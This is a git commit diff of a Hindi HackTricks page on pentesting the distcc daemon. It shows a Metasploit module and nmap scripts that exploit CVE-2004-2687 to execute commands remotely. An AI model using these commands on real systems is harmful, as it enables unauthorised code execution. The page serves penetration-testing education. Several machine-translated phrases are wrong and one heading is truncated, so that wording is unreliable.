Translated ['network-services-pentesting/3632-pentesting-distcc.md'] to

This commit is contained in:
Translator 2024-03-11 14:45:00 +00:00
parent d407009bb5
commit 2e5ef283ab

View file

@ -2,32 +2,32 @@
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए:
HackTricks का समर्थन करने के अन्य तरीके:
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहत हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** के [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके
</details>
# मूल जानकारी
**Distcc** एक टूल है जो **संकलन प्रक्रिया** को बेहतर बनाता है जिसमें नेटवर्क में अन्य कंप्यूटरों की **निष्क्रिय प्रोसेसिंग पावर** का उपयोग किया जाता है। जब **distcc**िसी मशीन पर सेट किया जाता है, तो यह मशीन अपने **संकलन कार्यों** को दूसरे सिस्टम में वितरित करने में सक्षम होती है। इस प्राप्तकर्ता सिस्टम पर **distccd डेमन** चल रहा होना चाहिए और भेजे गए कोड को प्रोसेस करने के लिए एक **संगत कंपाइलर** इंस्टॉल किया होना चाहिए।
**Distcc** एक टूल है जो **संगठन प्रक्रिया** को बढ़ाता है जिससे नेटवर्क में अन्य कंप्यूटरों की **निष्क्रिय प्रोसेसिंग पावर** का उपयोग किया जा सकता है। जब **distcc** क मशीन पर सेट किया जाता है, तो यह मशीन अपने **कंपाइलेशन टास्क** को दूसरे सिस्टम में वितरित करने में सक्षम होती है। इस प्राप्तकर्ता सिस्टम पर **distccd डेमन** चल रहा होना चाहिए और भेजे गए कोड को प्रोसेस करने के लिए एक **संगत कंपाइलर** इंस्टॉल किया होना चाहिए।
**डिफ़ॉल्ट पोर्ट:** 3632
```
PORT STATE SERVICE
3632/tcp open distccd
```
# शोषण
# शो
जांचें कि क्या यह **CVE-2004-2687** के लिए वंशावली है ताकि विचारशील कोड को निषेधित किया जा सके:
जांचें कि **CVE-2004-2687** के लिए यह वंशावली है ताकि विचारशील कोड को क्रियान्वित किया जा सके:
```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
```
# Shodan
@ -38,7 +38,8 @@ _मुझे लगता है कि शोडन इस सेवा को
* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec)
* [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
पोस्ट बनाया गया है **Álex B (@r1p)**
Post created by **Álex B (@r1p)**
<details>
@ -48,8 +49,8 @@ HackTricks का समर्थन करने के अन्य तरी
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) का खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, HackTricks** और **HackTricks Cloud** github रेपो में PR जमा करके।
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **जुड़ें** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या हमें **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details>